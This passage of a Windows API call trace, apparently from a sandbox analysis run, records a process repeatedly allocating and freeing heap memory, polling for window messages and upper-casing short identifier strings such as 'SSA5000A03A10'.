Size=0x214) returned 0x2416270 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0196.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0196.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.501] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0196.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0196.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0196.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.502] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.503] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.503] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0196.504] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0196.504] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0196.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0196.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0196.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.505] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0196.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0196.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.506] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0196.506] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0196.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0196.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0196.507] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0196.507] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.509] HeapFree (in: 